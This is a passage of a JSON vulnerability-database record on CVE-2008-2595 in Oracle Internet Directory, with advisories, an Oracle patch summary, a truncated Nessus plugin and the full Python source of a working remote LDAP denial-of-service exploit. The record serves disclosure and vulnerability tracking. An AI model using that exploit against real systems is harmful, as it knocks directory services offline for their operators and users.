"CVE-2008-2577", "CVE-2008-2581", "CVE-2008-2582", "CVE-2008-2597", "CVE-2008-2604", "CVE-2008-2589", "CVE-2008-2602", "CVE-2008-2598", "CVE-2008-2576", "CVE-2008-2607", "CVE-2008-2601", "CVE-2008-2617", "CVE-2008-2614", "CVE-2008-2595", "CVE-2008-2578", "CVE-2008-2616", "CVE-2008-2594", "CVE-2008-2608", "CVE-2008-2611", "CVE-2008-2580", "CVE-2008-2590", "CVE-2008-2586", "CVE-2008-2610", "CVE-2008-2613", "CVE-2008-2621", "CVE-2008-2609", "CVE-2008-2622", "CVE-2008-2592", "CVE-2008-2599", "CVE-2008-2593", "CVE-2008-2618", "CVE-2008-2585", "CVE-2008-2596", "CVE-2008-2615"], "modified": "2008-08-05T00:00:00", "id": "SECURITYVULNS:VULN:9153", "href": "https://vulners.com/securityvulns/SECURITYVULNS:VULN:9153", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "checkpoint_advisories": [{"lastseen": "2022-06-30T22:58:27", "description": "There exists a denial of service vulnerability in the Oracle Internet Directory. The vulnerability is due to a NULL pointer dereference error when processing LDAP requests. 
Remote unauthenticated attackers could exploit this vulnerability by sending a crafted LDAP request to create a denial of service condition on the target system.", "cvss3": {}, "published": "2014-04-10T00:00:00", "type": "checkpoint_advisories", "title": "Oracle Internet Directory Pre-Authentication LDAP Denial of Service (CVE-2008-2595)", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2008-2595"], "modified": "2014-04-10T00:00:00", "id": "CPAI-2014-1343", "href": "", "cvss": {"score": 0.0, "vector": "NONE"}}], "exploitdb": [{"lastseen": "2022-01-13T07:05:45", "description": "", "cvss3": {}, "published": "2008-07-19T00:00:00", "type": "exploitdb", "title": "Oracle Internet Directory 10.1.4 - Remote Denial of Service", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2008-2595", "2008-2595"], "modified": "2008-07-19T00:00:00", "id": "EDB-ID:6101", "href": "https://www.exploit-db.com/exploits/6101", "sourceData": "#!/usr/bin/python\r\n\r\n\"\"\"\r\nOracle Internet Directory 10.1.4 preauthentication Denial Of Service\r\n\r\nNOTES: Under 32 bits platforms it crashes immediately. Under 64 bits it may take even hours.\r\nSometimes you need 2 shoots to crash OID completely. 
The server \"commonly\" tolerates one\r\nshoot, but even when you only send one packet it will crash.\r\n\r\nTested: Win2000 x86, WinXP x86, Win2003 X86_64\r\n\r\nVulnerability found by Joxean Koret (joxeankoret [ at ] yahoo DOT es)\r\n\r\nFixed: Oracle Critical Patch Update July 2008\r\nCVEID: CVE-2008-2595\r\n\"\"\"\r\n\r\nimport sys\r\nimport time\r\nimport socket\r\n\r\nhealthPacket = \"0%\\\\x02\\\\x01\\\\x01c \\\\x04\\\\x00\\\\n\\\\x01\\\\x02\\\\n\\\\x01\\\\x00\\\\x02\\\\x01\\\\x00\\\\x02\\\\x01\\\\x00\\\\x01\\\\x01\\\\x00\\\\x87\\\\x0bobjectClass0\\\\x00\"\r\npacket = \"\\x30\\x0e\\x02\\x01\\x01\\x60\\x09\\x30\\x01\\x03\\x04\\x02\\x44\\x4e\\x80\\x00\"\r\n\r\ndef checkHealth(hostname, port):\r\n print \" --> Wating 5 seconds\"\r\n time.sleep(5)\r\n \r\n print \" --> Connecting to target...\"\r\n socket.setdefaulttimeout(5)\r\n s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\r\n s.connect((hostname, port))\r\n\r\n try:\r\n print \" --> Sending 'health' packet ...\"\r\n s.sendall(healthPacket)\r\n print \" --> Trying to receive something...\"\r\n data = s.recv(1024)\r\n except:\r\n err = sys.exc_info()[1]\r\n\r\n if int(err[0]) == 104:\r\n print \"[+] Exploits works!\"\r\n return\r\n\r\n if data != \"\":\r\n print \"[!] Server is up and running :(\"\r\n else:\r\n print \"[?] Server doesn't answer nothing. 
It works?\"\r\n\r\ndef oidDos(hostname, port):\r\n s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\r\n try:\r\n print \"[+] Connecting to ldap://%s:%d...\" % (hostname, port)\r\n s.connect((hostname, int(port)))\r\n\r\n print \"[+] Sending packet...\"\r\n s.sendall(packet)\r\n s.close()\r\n\r\n print \"[+] Checking OID's health...\"\r\n checkHealth(hostname, port)\r\n except:\r\n print sys.exc_info()[1]\r\n\r\ndef usage():\r\n print \"Oracle Internet Directory 10.1.4 Remote Preauthentication DOS\"\r\n print \"Copyright (c) 2007 Joxean Koret\"\r\n print\r\n print \"Usage:\"\r\n print sys.argv[0],\"-h<hostname> -p<port>\"\r\n print\r\n\r\ndef main():\r\n if len(sys.argv) != 3:\r\n usage()\r\n sys.exit(0)\r\n \r\n hostname = None\r\n port = None\r\n\r\n i = 0\r\n for param in sys.argv:\r\n i += 1\r\n \r\n if i == 1:\r\n continue\r\n \r\n if param.startswith(\"-h\"):\r\n hostname = param[2:]\r\n elif param.startswith(\"-p\"):\r\n port = int(param[2:])\r\n else:\r\n print \"Unknown option '%s'\" % param\r\n usage()\r\n sys.exit(1)\r\n \r\n if not hostname or not port:\r\n print \"Bad command line.\"\r\n usage()\r\n sys.exit(1)\r\n\r\n oidDos(hostname, port)\r\n\r\nif __name__ == \"__main__\":\r\n main()\r\n\r\n# milw0rm.com [2008-07-19]", "sourceHref": "https://www.exploit-db.com/download/6101", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}], "oracle": [{"lastseen": "2021-06-08T18:46:07", "description": "A Critical Patch Update is a collection of patches for multiple security vulnerabilities. It also includes non-security fixes that are required (because of interdependencies) by those security patches. Critical Patch Updates are cumulative, except as noted below, but each advisory describes only the security fixes added since the previous Critical Patch Update. Thus, prior Critical Patch Update Advisories should be reviewed for information regarding earlier accumulated security fixes. 
Please refer to\n\nCritical Patch Updates and Security Alerts for information about Oracle Security Advisories.\n\nDue to the threat posed by a successful attack, Oracle strongly recommends that customers apply fixes as soon as possible. This Critical Patch Update contains 45 new security fixes across all products.\n", "cvss3": {}, "published": "2008-07-15T00:00:00", "type": "oracle", "title": "CPUJul2008 Advisory", "bulletinFamily": "software", "cvss2": {}, "cvelist": ["CVE-2008-2606", "CVE-2008-2579", "CVE-2008-2591", "CVE-2008-2600", "CVE-2008-2612", "CVE-2008-2605", "CVE-2007-1359", "CVE-2008-2603", "CVE-2008-2620", "CVE-2008-2587", "CVE-2008-2583", "CVE-2008-2577", "CVE-2008-2581", "CVE-2008-2582", "CVE-2008-2597", "CVE-2008-2604", "CVE-2008-2589", "CVE-2008-2602", "CVE-2008-2598", "CVE-2008-2576", "CVE-2008-2607", "CVE-2008-2601", "CVE-2008-2617", "CVE-2008-2614", "CVE-2008-2595", "CVE-2008-2578", "CVE-2008-2616", "CVE-2008-2594", "CVE-2008-2608", "CVE-2008-2611", "CVE-2008-2580", "CVE-2008-2590", "CVE-2008-2586", "CVE-2008-2610", "CVE-2008-2613", "CVE-2008-2621", "CVE-2008-2609", "CVE-2008-2622", "CVE-2008-2592", "CVE-2008-2599", "CVE-2008-2593", "CVE-2008-2618", "CVE-2008-2585", "CVE-2008-2596", "CVE-2008-2615"], "modified": "2008-08-04T00:00:00", "id": "ORACLE:CPUJUL2008-090335", "href": "https://www.oracle.com/security-alerts/cpujul2008.html", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "nessus": [{"lastseen": "2021-08-19T12:59:10", "description": "The remote host is running Oracle Application Server. 
It was not possible to determine its version, so the version of Oracle Application Server installed on the remote host could potentially be affected by multiple vulnerabilities :\n\n - CVE-2000-0169: Remote command execution in the web listener component.\n\n - CVE-2000-1235: Information disclosure in the port listener component and modplsql.\n\n - CVE-2000-1236: SQL injection in mod_sql.\n\n - CVE-2001-0326: Information disclosure in the Java Virtual Machine.\n\n - CVE-2001-0419: Buffer overflow in ndwfn4.so.\n\n - CVE-2001-0591: Directory traversal.\n\n - CVE-2001-1216: Buffer overflow in the PL/SQL Apache module.\n\n - CVE-2001-1217: Directory traversal vulnerability in the PL/SQL Apache module.\n\n - CVE-2001-1371: Improper access control in the SOAP service.\n\n - CVE-2001-1372: Information disclosure.\n\n - CVE-2002-0386: Denial of service through the administration module for Oracle Web Cache.\n\n - CVE-2002-0559: Buffer overflows in the PL/SQL module.\n\n - CVE-2002-0560: Information disclosure in the PL/SQL module.\n\n - CVE-2002-0561: Authentication bypass in the PL/SQL Gateway web administration interface.\n\n - CVE-2002-0562: Information disclosure through globals.jsa.\n\n - CVE-2002-0563: Improper access control on several services.\n\n - CVE-2002-0564: Authentication bypass in the PL/SQL module.\n\n - CVE-2002-0565: Information disclosure through JSP files in the _pages directory.\n\n - CVE-2002-0566: Denial of service in the PL/SQL module.\n\n - CVE-2002-0568: Improper access control on XSQLConfig.xml and soapConfig.xml.\n\n - CVE-2002-0569: Authentication bypass through XSQLServlet.\n\n - CVE-2002-0655: Denial of service in OpenSSL.\n\n - CVE-2002-0656: Buffer overflows in OpenSSL.\n\n - CVE-2002-0659: Denial of service in OpenSSL.\n\n - CVE-2002-0840: Cross-site scripting in the default error page of Apache.\n\n - CVE-2002-0842: Format string vulnerability in mod_dav.\n\n - CVE-2002-0843: Buffer overflows in ApacheBench.\n\n - CVE-2002-0947: Buffer 
overflow in rwcgi60.\n\n - CVE-2002-1089: Information disclosure in rwcgi60.\n\n - CVE-2002-1630: Improper access control on sendmail.jsp.\n\n - CVE-2002-1631: SQL injection in query.xsql.\n\n - CVE-2002-1632: Information disclosure through several JSP pages.\n\n - CVE-2002-1635: Information disclosure in Apache.\n\n - CVE-2002-1636: Cross-site scripting in the htp PL/SQL package.\n\n - CVE-2002-1637: Default credentials in multiple components.\n\n - CVE-2002-1858: Information disclosure through the WEB-INF directory.\n\n - CVE-2002-2153: Format string vulnerability in the administrative pages of the PL/SQL module.\n\n - CVE-2002-2345: Credential leakage in the web cache administrator interface.\n\n - CVE-2002-2347: Cross-site scripting in several JSP pages.\n\n - CVE-2004-1362: Authentication bypass in the PL/SQL module.\n\n - CVE-2004-1363: Buffer overflow in extproc.\n\n - CVE-2004-1364: Directory traversal in extproc.\n\n - CVE-2004-1365: Command execution in extproc.\n\n - CVE-2004-1366: Improper access control on emoms.properties.\n\n - CVE-2004-1367: Credential leakage in Database Server.\n\n - CVE-2004-1368: Arbitrary file execution in ISQL*Plus.\n\n - CVE-2004-1369: Denial of service in TNS Listener.\n\n - CVE-2004-1370: Multiple SQL injection vulnerabilities in PL/SQL.\n\n - CVE-2004-1371: Stack-based buffer overflow.\n\n - CVE-2004-1707: Privilege escalation in dbsnmp and nmo.\n\n - CVE-2004-1774: Buffer overflow in the MD2 package.\n\n - CVE-2004-1877: Phishing vulnerability in Single Sign-On component.\n\n - CVE-2004-2134: Weak cryptography for passwords in the toplink mapping workBench.\n\n - CVE-2004-2244: Denial of service in the XML parser.\n\n - CVE-2005-1383: Authentication bypass in HTTP Server.\n\n - CVE-2005-1495: Detection bypass.\n\n - CVE-2005-1496: Privilege escalation in the DBMS_Scheduler.\n\n - CVE-2005-2093: Web cache poisoning.\n\n - CVE-2005-3204: Cross-site scripting.\n\n - CVE-2005-3445: Multiple unspecified vulnerabilities in HTTP 
Server.\n\n - CVE-2005-3446: Unspecified vulnerability in Internet Directory.\n\n - CVE-2005-3447: Unspecified vulnerability in Single Sign-On.\n\n - CVE-2005-3448: Unspecified vulnerability in the OC4J module.\n\n - CVE-2005-3449: Multiple unspecified vulnerabilities in multiple components.\n\n - CVE-2005-3450: Unspecified vulnerability in HTTP Server.\n\n - CVE-2005-3451: Unspecified vulnerability in SQL*ReportWriter.\n\n - CVE-2005-3452: Unspecified vulnerability in Web Cache.\n\n - CVE-2005-3453: Multiple unspecified vulnerabilities in Web Cache.\n\n - CVE-2006-0273: Unspecified vulnerability in the Portal component.\n\n - CVE-2006-0274: Unspecified vulnerability in the Oracle Reports Developer component.\n\n - CVE-2006-0275: Unspecified vulnerability in the Oracle Reports Developer component.\n\n - CVE-2006-0282: Unspecified vulnerability.\n\n - CVE-2006-0283: Unspecified vulnerability.\n\n - CVE-2006-0284: Multiple unspecified vulnerabilities.\n\n - CVE-2006-0285: Unspecified vulnerability in the Java Net component.\n\n - CVE-2006-0286: Unspecified vulnerability in HTTP Server.\n\n - CVE-2006-0287: Unspecified vulnerability in HTTP Server.\n\n - CVE-2006-0288: Multiple unspecified vulnerabilities in the Oracle Reports Developer component.\n\n - CVE-2006-0289: Multiple unspecified vulnerabilities.\n\n - CVE-2006-0290: Unspecified vulnerability in the Oracle Workflow Cartridge component.\n\n - CVE-2006-0291: Multiple unspecified vulnerabilities in the Oracle Workflow Cartridge component.\n\n - CVE-2006-0435: Unspecified vulnerability in Oracle PL/SQL.\n\n - CVE-2006-0552: Unspecified vulnerability in the Net Listener component.\n\n - CVE-2006-0586: Multiple SQL injection vulnerabilities.\n\n - CVE-2006-1884: Unspecified vulnerability in the Oracle Thesaurus Management System component.\n\n - CVE-2006-3706: Unspecified vulnerability in Oracle Containers for J2EE.\n\n - CVE-2006-3707: Unspecified vulnerability in Oracle Containers for J2EE.\n\n - CVE-2006-3708: 
Unspecified vulnerability in Oracle Containers for J2EE.\n\n - CVE-2006-3709: Unspecified vulnerability in Oracle Containers for J2EE.\n\n - CVE-2006-3710: Unspecified vulnerability in Oracle Containers for J2EE.\n\n - CVE-2006-3711: Unspecified vulnerability in Oracle Containers for J2EE.\n\n - CVE-2006-3712: Unspecified vulnerability in Oracle Containers for J2EE.\n\n - CVE-2006-3713: Unspecified vulnerability in Oracle Containers for J2EE.\n\n - CVE-2006-3714: Unspecified vulnerability in Oracle Containers for J2EE.\n\n - CVE-2006-5353: Unspecified vulnerability in HTTP Server.\n\n - CVE-2006-5354: Unspecified vulnerability in HTTP Server.\n\n - CVE-2006-5355: Unspecified vulnerability in Single Sign-On.\n\n - CVE-2006-5356: Unspecified vulnerability in Oracle Containers for J2EE.\n\n - CVE-2006-5357: Unspecified vulnerability in HTTP Server.\n\n - CVE-2006-5358: Unspecified vulnerability in the Oracle Forms component.\n\n - CVE-2006-5359: Multiple unspecified vulnerabilities in Oracle Reports Developer component.\n\n - CVE-2006-5360: Unspecified vulnerability in Oracle Forms component.\n\n - CVE-2006-5361: Unspecified vulnerability in Oracle Containers for J2EE.\n\n - CVE-2006-5362: Unspecified vulnerability in Oracle Containers for J2EE.\n\n - CVE-2006-5363: Unspecified vulnerability in Single Sign-On.\n\n - CVE-2006-5364: Unspecified vulnerability in Oracle Containers for J2EE.\n\n - CVE-2006-5365: Unspecified vulnerability in Oracle Forms.\n\n - CVE-2006-5366: Multiple unspecified vulnerabilities.\n\n - CVE-2007-0222: Directory traversal vulnerability in EmChartBean.\n\n - CVE-2007-0275: Cross-site scripting vulnerability in Oracle Reports Web Cartridge (RWCGI60).\n\n - CVE-2007-0280: Buffer overflow in Oracle Notification Service.\n\n - CVE-2007-0281: Multiple unspecified vulnerabilities in HTTP Server.\n\n - CVE-2007-0282: Unspecified vulnerability in OPMN02.\n\n - CVE-2007-0283: Unspecified vulnerability in Oracle Containers for J2EE.\n\n - CVE-2007-0284: 
Multiple unspecified vulnerabilities in Oracle Containers for J2EE.\n\n - CVE-2007-0285: Unspecified vulnerability in Oracle Reports Developer.\n\n - CVE-2007-0286: Unspecified vulnerability in Oracle Containers for J2EE.\n\n - CVE-2007-0287: Unspecified vulnerability in Oracle Containers for J2EE.\n\n - CVE-2007-0288: Unspecified vulnerability in Oracle Internet Directory.\n\n - CVE-2007-0289: Multiple unspecified vulnerabilities in Oracle Containers for J2EE.\n\n - CVE-2007-1359: Improper access control in mod_security.\n\n - CVE-2007-1609: Cross-site scripting vulnerability in servlet/Spy in Dynamic Monitoring Services (DMS).\n\n - CVE-2007-2119: Cross-site scripting vulnerability in the Administration Front End for Oracle Enterprise (Ultra) Search.\n\n - CVE-2007-2120: Denial of service in the Oracle Discoverer servlet.\n\n - CVE-2007-2121: Unspecified vulnerability in the COREid Access component.\n\n - CVE-2007-2122: Unspecified vulnerability in the Wireless component.\n\n - CVE-2007-2123: Unspecified vulnerability in the Portal component.\n\n - CVE-2007-2124: Unspecified vulnerability in the Portal component.\n\n - CVE-2007-2130: Unspecified vulnerability in Workflow Cartridge.\n\n - CVE-2007-3553: Cross-site scripting vulnerability in Rapid Install Web Server.\n\n - CVE-2007-3854: Multiple unspecified vulnerabilities in the Advanced Queuing component and the Spatial component.\n\n - CVE-2007-3859: Unspecified vulnerability in the Oracle Internet Directory component.\n\n - CVE-2007-3861: Unspecified vulnerability in Oracle Jdeveloper.\n\n - CVE-2007-3862: Unspecified vulnerability in Single Sign-On.\n\n - CVE-2007-3863: Unspecified vulnerability in Oracle JDeveloper.\n\n - CVE-2007-5516: Unspecified vulnerability in the Oracle Process Mgmt & Notification component.\n\n - CVE-2007-5517: Unspecified vulnerability in the Oracle Portal component.\n\n - CVE-2007-5518: Unspecified vulnerability in HTTP Server.\n\n - CVE-2007-5519: Unspecified vulnerability in the 
Oracle Portal component.\n\n - CVE-2007-5520: Unspecified vulnerability in the Oracle Internet Directory component.\n\n - CVE-2007-5521: Unspecified vulnerability in Oracle Containers for J2EE.\n\n - CVE-2007-5522: Unspecified vulnerability in the Oracle Portal component.\n\n - CVE-2007-5523: Unspecified vulnerability in the Oracle Internet Directory component.\n\n - CVE-2007-5524: Unspecified vulnerability in Single Sign-On.\n\n - CVE-2007-5525: Unspecified vulnerability in Single Sign-On.\n\n - CVE-2007-5526: Unspecified vulnerability in the Oracle Portal component.\n\n - CVE-2007-5531: Unspecified vulnerability in Oracle Help for Web.\n\n - CVE-2008-0340: Multiple unspecified vulnerabilities in the Advanced Queuing component and Spatial component.\n\n - CVE-2008-0343: Unspecified vulnerability in the Oracle Spatial component.\n\n - CVE-2008-0344: Unspecified vulnerability in the Oracle Spatial component.\n\n - CVE-2008-0345: Unspecified vulnerability in the Core RDBMS component.\n\n - CVE-2008-0346: Unspecified vulnerability in the Oracle Jinitiator component.\n\n - CVE-2008-0347: Unspecified vulnerability in the Oracle Ultra Search component.\n\n - CVE-2008-0348: Multiple unspecified vulnerabilities in the PeopleTools component.\n\n - CVE-2008-0349: Unspecified vulnerability in the PeopleTools component.\n\n - CVE-2008-1812: Unspecified vulnerability in the Oracle Enterprise Manager component.\n\n - CVE-2008-1814: Unspecified vulnerability in the Oracle Secure Enterprise Search or Ultrasearch component.\n\n - CVE-2008-1823: Unspecified vulnerability in the Oracle Jinitiator component.\n\n - CVE-2008-1824: Unspecified vulnerability in the Oracle Dynamic Monitoring Service component.\n\n - CVE-2008-1825: Unspecified vulnerability in the Oracle Portal component.\n\n - CVE-2008-2583: Unspecified vulnerability in the sample Discussion Forum Portlet for the Oracle Portal component.\n\n - CVE-2008-2588: Unspecified vulnerability in the Oracle JDeveloper component.\n\n 
- CVE-2008-2589: Unspecified vulnerability in the Oracle Portal component.\n\n - CVE-2008-2593: Unspecified vulnerability in the Oracle Portal component.\n\n - CVE-2008-2594: Unspecified vulnerability in the Oracle Portal component.\n\n - CVE-2008-2595: Unspecified vulnerability in the Oracle Internet Directory component.\n\n - CVE-2008-2609: Unspecified vulnerability in the Oracle Portal component.\n\n - CVE-2008-2612: Unspecified vulnerability in the Hyperion BI Plus component.\n\n - CVE-2008-2614: Unspecified vulnerability in HTTP Server.\n\n - CVE-2008-2619: Unspecified vulnerability in the Oracle Reports Developer component.\n\n - CVE-2008-2623: Unspecified vulnerability in the Oracle JDeveloper component.\n\n - CVE-2008-3975: Unspecified vulnerability in the Oracle Portal component.\n\n - CVE-2008-3977: Unspecified vulnerability in the Oracle Portal component.\n\n - CVE-2008-3986: Unspecified vulnerability in the Oracle Discoverer Administrator component.\n\n - CVE-2008-3987: Unspecified vulnerability in the Oracle Discoverer Desktop component.\n\n - CVE-2008-4014: Unspecified vulnerability in the Oracle BPEL Process Manager component.\n\n - CVE-2008-4017: Unspecified vulnerability in the OC4J component.\n\n - CVE-2008-5438: Unspecified vulnerability in the Oracle Portal component.\n\n - CVE-2008-7233: Unspecified vulnerability in the Oracle Jinitiator component.\n\n - CVE-2009-0217: Signature spoofing vulnerability in multiple components.\n\n - CVE-2009-0989: Unspecified vulnerability in the BI Publisher component.\n\n - CVE-2009-0990: Unspecified vulnerability in the BI Publisher component.\n\n - CVE-2009-0994: Unspecified vulnerability in the BI Publisher component.\n\n - CVE-2009-1008: Unspecified vulnerability in the Outside In Technology component.\n\n - CVE-2009-1009: Unspecified vulnerability in the Outside In Technology component.\n\n - CVE-2009-1010: Unspecified vulnerability in the Outside In Technology component.\n\n - CVE-2009-1011: Unspecified 
vulnerability in the Outside In Technology component.\n\n - CVE-2009-1017: Unspecified vulnerability in the BI Publisher component.\n\n - CVE-2009-1976: Unspecified vulnerability in HTTP Server.\n\n - CVE-2009-1990: Unspecified vulnerability in the Business Intelligence Enterprise Edition component.\n\n - CVE-2009-1999: Unspecified vulnerability in the Business Intelligence Enterprise Edition component.\n\n - CVE-2009-3407: Unspecified vulnerability in the Portal component.\n\n - CVE-2009-3412: Unspecified vulnerability in the Unzip component.\n\n - CVE-2010-0066: Unspecified vulnerability in the Access Manager Identity Server component.\n\n - CVE-2010-0067: Unspecified vulnerability in the Oracle Containers for J2EE component.\n\n - CVE-2010-0070: Unspecified vulnerability in the Oracle Containers for J2EE component.\n\n - CVE-2011-0789: Unspecified vulnerability in HTTP Server.\n\n - CVE-2011-0795: Unspecified vulnerability in Single Sign-On.\n\n - CVE-2011-0884: Unspecified vulnerability in the Oracle BPEL Process Manager component.\n\n - CVE-2011-2237: Unspecified vulnerability in the Oracle Web Services Manager component.\n\n - CVE-2011-2314: Unspecified vulnerability in the Oracle Containers for J2EE component.\n\n - CVE-2011-3523: Unspecified vulnerability in the Oracle Web Services Manager component.", "cvss3": {"score": null, "vector": null}, "published": "2012-01-24T00:00:00", "type": "nessus", "title": "Oracle Application Server Multiple Vulnerabilities", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2000-0169", "CVE-2000-1235", "CVE-2000-1236", "CVE-2001-0326", "CVE-2001-0419", "CVE-2001-0591", "CVE-2001-1216", "CVE-2001-1217", "CVE-2001-1371", "CVE-2001-1372", "CVE-2002-0386", "CVE-2002-0559", "CVE-2002-0560", "CVE-2002-0561", "CVE-2002-0562", "CVE-2002-0563", "CVE-2002-0564", "CVE-2002-0565", "CVE-2002-0566", "CVE-2002-0568", "CVE-2002-0569", "CVE-2002-0655", "CVE-2002-0656", "CVE-2002-0659", "CVE-2002-0840", "CVE-2002-0842", 
"CVE-2002-0843", "CVE-2002-0947", "CVE-2002-1089", "CVE-2002-1630", "CVE-2002-1631", "CVE-2002-1632", "CVE-2002-1635", "CVE-2002-1636", "CVE-2002-1637", "CVE-2002-1858", "CVE-2002-2153", "CVE-2002-2345", "CVE-2002-2347", "CVE-2004-1362", "CVE-2004-1363", "CVE-2004-1364", "CVE-2004-1365", "CVE-2004-1366", "CVE-2004-1367", "CVE-2004-1368", "CVE-2004-1369", "CVE-2004-1370", "CVE-2004-1371", "CVE-2004-1707", "CVE-2004-1774", "CVE-2004-1877", "CVE-2004-2134", "CVE-2004-2244", "CVE-2005-1383", "CVE-2005-1495", "CVE-2005-1496", "CVE-2005-2093", "CVE-2005-3204", "CVE-2005-3445", "CVE-2005-3446", "CVE-2005-3447", "CVE-2005-3448", "CVE-2005-3449", "CVE-2005-3450", "CVE-2005-3451", "CVE-2005-3452", "CVE-2005-3453", "CVE-2006-0273", "CVE-2006-0274", "CVE-2006-0275", "CVE-2006-0282", "CVE-2006-0283", "CVE-2006-0284", "CVE-2006-0285", "CVE-2006-0286", "CVE-2006-0287", "CVE-2006-0288", "CVE-2006-0289", "CVE-2006-0290", "CVE-2006-0291", "CVE-2006-0435", "CVE-2006-0552", "CVE-2006-0586", "CVE-2006-1884", "CVE-2006-3706", "CVE-2006-3707", "CVE-2006-3708", "CVE-2006-3709", "CVE-2006-3710", "CVE-2006-3711", "CVE-2006-3712", "CVE-2006-3713", "CVE-2006-3714", "CVE-2006-5353", "CVE-2006-5354", "CVE-2006-5355", "CVE-2006-5356", "CVE-2006-5357", "CVE-2006-5358", "CVE-2006-5359", "CVE-2006-5360", "CVE-2006-5361", "CVE-2006-5362", "CVE-2006-5363", "CVE-2006-5364", "CVE-2006-5365", "CVE-2006-5366", "CVE-2007-0222", "CVE-2007-0275", "CVE-2007-0280", "CVE-2007-0281", "CVE-2007-0282", "CVE-2007-0283", "CVE-2007-0284", "CVE-2007-0285", "CVE-2007-0286", "CVE-2007-0287", "CVE-2007-0288", "CVE-2007-0289", "CVE-2007-1359", "CVE-2007-1609", "CVE-2007-2119", "CVE-2007-2120", "CVE-2007-2121", "CVE-2007-2122", "CVE-2007-2123", "CVE-2007-2124", "CVE-2007-2130", "CVE-2007-3553", "CVE-2007-3854", "CVE-2007-3859", "CVE-2007-3861", "CVE-2007-3862", "CVE-2007-3863", "CVE-2007-5516", "CVE-2007-5517", "CVE-2007-5518", "CVE-2007-5519", "CVE-2007-5520", "CVE-2007-5521", "CVE-2007-5522", "CVE-2007-5523", 
"CVE-2007-5524", "CVE-2007-5525", "CVE-2007-5526", "CVE-2007-5531", "CVE-2008-0340", "CVE-2008-0343", "CVE-2008-0344", "CVE-2008-0345", "CVE-2008-0346", "CVE-2008-0347", "CVE-2008-0348", "CVE-2008-0349", "CVE-2008-1812", "CVE-2008-1814", "CVE-2008-1823", "CVE-2008-1824", "CVE-2008-1825", "CVE-2008-2583", "CVE-2008-2588", "CVE-2008-2589", "CVE-2008-2593", "CVE-2008-2594", "CVE-2008-2595", "CVE-2008-2609", "CVE-2008-2612", "CVE-2008-2614", "CVE-2008-2619", "CVE-2008-2623", "CVE-2008-3975", "CVE-2008-3977", "CVE-2008-3986", "CVE-2008-3987", "CVE-2008-4014", "CVE-2008-4017", "CVE-2008-5438", "CVE-2008-7233", "CVE-2009-0217", "CVE-2009-0989", "CVE-2009-0990", "CVE-2009-0994", "CVE-2009-1008", "CVE-2009-1009", "CVE-2009-1010", "CVE-2009-1011", "CVE-2009-1017", "CVE-2009-1976", "CVE-2009-1990", "CVE-2009-1999", "CVE-2009-3407", "CVE-2009-3412", "CVE-2010-0066", "CVE-2010-0067", "CVE-2010-0070", "CVE-2011-0789", "CVE-2011-0795", "CVE-2011-0884", "CVE-2011-2237", "CVE-2011-2314", "CVE-2011-3523"], "modified": "2019-04-05T00:00:00", "cpe": ["cpe:/a:oracle:application_server"], "id": "ORACLE_APPLICATION_SERVER_PCI.NASL", "href": "https://www.tenable.com/plugins/nessus/57619", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(57619);\n script_version(\"1.23\");\n script_cvs_date(\"Date: 2019/04/05 15:04:42\");\n\n script_cve_id(\n \"CVE-2000-0169\",\n \"CVE-2000-1235\",\n \"CVE-2000-1236\",\n \"CVE-2001-0326\",\n \"CVE-2001-0419\",\n \"CVE-2001-0591\",\n \"CVE-2001-1216\",\n \"CVE-2001-1217\",\n \"CVE-2001-1371\",\n \"CVE-2001-1372\",\n \"CVE-2002-0386\",\n \"CVE-2002-0559\",\n \"CVE-2002-0560\",\n \"CVE-2002-0561\",\n \"CVE-2002-0562\",\n \"CVE-2002-0563\",\n \"CVE-2002-0564\",\n \"CVE-2002-0565\",\n \"CVE-2002-0566\",\n \"CVE-2002-0568\",\n \"CVE-2002-0569\",\n \"CVE-2002-0655\",\n \"CVE-2002-0656\",\n \"CVE-2002-0659\",\n \"CVE-2002-0840\",\n \"CVE-2002-0842\",\n \"CVE-2002-0843\",\n \"CVE-2002-0947\",\n 
\"CVE-2002-1089\",\n \"CVE-2002-1630\",\n \"CVE-2002-1631\",\n \"CVE-2002-1632\",\n \"CVE-2002-1635\",\n \"CVE-2002-1636\",\n \"CVE-2002-1637\",\n \"CVE-2002-1858\",\n \"CVE-2002-2153\",\n \"CVE-2002-2345\",\n \"CVE-2002-2347\",\n \"CVE-2004-1362\",\n \"CVE-2004-1363\",\n \"CVE-2004-1364\",\n \"CVE-2004-1365\",\n \"CVE-2004-1366\",\n \"CVE-2004-1367\",\n \"CVE-2004-1368\",\n \"CVE-2004-1369\",\n \"CVE-2004-1370\",\n \"CVE-2004-1371\",\n \"CVE-2004-1707\",\n \"CVE-2004-1774\",\n \"CVE-2004-1877\",\n \"CVE-2004-2134\",\n \"CVE-2004-2244\",\n \"CVE-2005-1383\",\n \"CVE-2005-1495\",\n \"CVE-2005-1496\",\n \"CVE-2005-2093\",\n \"CVE-2005-3204\",\n \"CVE-2005-3445\",\n \"CVE-2005-3446\",\n \"CVE-2005-3447\",\n \"CVE-2005-3448\",\n \"CVE-2005-3449\",\n \"CVE-2005-3450\",\n \"CVE-2005-3451\",\n \"CVE-2005-3452\",\n \"CVE-2005-3453\",\n \"CVE-2006-0273\",\n \"CVE-2006-0274\",\n \"CVE-2006-0275\",\n \"CVE-2006-0282\",\n \"CVE-2006-0283\",\n \"CVE-2006-0284\",\n \"CVE-2006-0285\",\n \"CVE-2006-0286\",\n \"CVE-2006-0287\",\n \"CVE-2006-0288\",\n \"CVE-2006-0289\",\n \"CVE-2006-0290\",\n 